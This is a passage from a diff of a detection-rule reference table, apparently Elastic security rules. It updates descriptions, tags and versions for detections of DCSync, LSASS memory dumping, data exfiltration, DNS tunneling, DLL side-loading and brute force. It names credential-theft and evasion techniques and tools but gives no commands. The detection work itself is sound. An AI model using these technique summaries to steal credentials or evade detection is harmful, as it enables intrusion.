[Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |109 +|<<potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |110 |<<potential-credential-access-via-duplicatehandle-in-lsass, Potential Credential Access via DuplicateHandle in LSASS>> |Identifies suspicious access to an LSASS handle via DuplicateHandle from an unknown call trace module. This may indicate an attempt to bypass the NtOpenProcess API to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 -|<<potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> |Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 +|<<potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> |Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic:Execution], [Data Source: Sysmon Only] |8.8.0 |207 -|<<potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> |Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.3.0 |104 +|<<potential-credential-access-via-memory-dump-file-creation, Potential Credential Access via Memory Dump File Creation>> |Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> |An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> |Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Sysmon Only] |8.3.0 |105 -|<<potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> |Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> |An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 + +|<<potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> |Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<potential-cross-site-scripting-xss, Potential Cross Site Scripting (XSS)>> |Cross-Site Scripting (XSS) is a type of attack in which malicious scripts are injected into trusted websites. In XSS attacks, an attacker uses a benign web application to send malicious code, generally in the form of a browser-side script. This detection rule identifies the potential malicious executions of such browser-side scripts. |[Data Source: APM], [Use Case: Threat Detection], [Tactic: Initial Access] |8.3.0 |1 +|<<potential-dga-activity, Potential DGA Activity>> |A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. |[Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + |<<potential-dll-side-loading-via-microsoft-antimalware-service-executable, Potential DLL Side-Loading via Microsoft Antimalware Service Executable>> |Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-dll-sideloading-via-trusted-microsoft-programs, Potential DLL SideLoading via Trusted Microsoft Programs>> |Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-dll-side-loading-via-trusted-microsoft-programs, Potential DLL Side-Loading via Trusted Microsoft Programs>> |Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> |This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> |This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-data-exfiltration-activity-to-an-unusual-destination-port, Potential Data Exfiltration Activity to an Unusual Destination Port>> |A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-ip-address, Potential Data Exfiltration Activity to an Unusual IP Address>> |A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-iso-code, Potential Data Exfiltration Activity to an Unusual ISO Code>> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-region, Potential Data Exfiltration Activity to an Unusual Region>> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 |<<potential-defense-evasion-via-cmstp-exe, Potential Defense Evasion via CMSTP.exe>> |The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program to install Connection Manager service profiles, which accept installation information file (INF) files. Adversaries may abuse CMSTP to proxy the execution of malicious code by supplying INF files that contain malicious commands. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> |Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> |Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-disabling-of-apparmor, Potential Disabling of AppArmor>> |This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-disabling-of-apparmor, Potential Disabling of AppArmor>> |This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-disabling-of-selinux, Potential Disabling of SELinux>> |Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-disabling-of-selinux, Potential Disabling of SELinux>> |Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<potential-evasion-via-filter-manager, Potential Evasion via Filter Manager>> |The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-exfiltration-via-certreq, Potential Exfiltration via Certreq>> |Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to exfiltrate data to a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 - |<<potential-exploitation-of-an-unquoted-service-path-vulnerability, Potential Exploitation of an Unquoted Service Path Vulnerability>> |Adversaries may leverage unquoted service path vulnerabilities to escalate privileges. By placing an executable in a higher-level directory within the path of an unquoted service executable, Windows will natively launch this executable from its defined path variable instead of the benign one in a deeper directory, thus leading to code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> |Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 +|<<potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> |Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |4 + +|<<potential-file-transfer-via-certreq, Potential File Transfer via Certreq>> |Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 |<<potential-hidden-local-user-account-creation, Potential Hidden Local User Account Creation>> |Identifies attempts to create a local account that will be hidden from the macOS logon window. This may indicate an attempt to evade user attention while maintaining persistence using a separate local account. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> |Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> |Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> |Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |7 +|<<potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> |Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |8 |<<potential-invoke-mimikatz-powershell-script, Potential Invoke-Mimikatz PowerShell Script>> |Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. This rule detects Invoke-Mimikatz PowerShell script and alike. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |106 @@ -1096,55 +1134,59 @@ and their rule type is `machine_learning`. |<<potential-lsass-memory-dump-via-psscapturesnapshot, Potential LSASS Memory Dump via PssCaptureSnapShot>> |Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 -|<<potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> |Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> |Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> |Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. |[Data Source: Elastic Endgame], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> |Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. |[Data Source: Elastic Endgame], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> |Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-linux-hack-tool-launched, Potential Linux Hack Tool Launched>> |Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> |This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |5 +|<<potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> |Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> |This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |6 |<<potential-linux-ssh-x11-forwarding, Potential Linux SSH X11 Forwarding>> |This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> |This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> |This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> |Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> |Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-malicious-file-downloaded-from-google-drive, Potential Malicious File Downloaded from Google Drive>> |Identifies potential malicious file download and execution from Google Drive. The rule checks for download activity from Google Drive URL, followed by the creation of files commonly leveraged by or for malware. This could indicate an attempt to run malicious scripts, executables or payloads. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control] |8.3.0 |1 -|<<potential-masquerading-as-browser-process, Potential Masquerading as Browser Process>> |Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-masquerading-as-browser-process, Potential Masquerading as Browser Process>> |Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-masquerading-as-business-app-installer, Potential Masquerading as Business App Installer>> |Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-business-app-installer, Potential Masquerading as Business App Installer>> |Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Initial Access], [Tactic: Execution], [Rule Type: BBR] |8.3.0 |2 -|<<potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> |Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> |Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-masquerading-as-system32-dll, Potential Masquerading as System32 DLL>> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-system32-dll, Potential Masquerading as System32 DLL>> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, 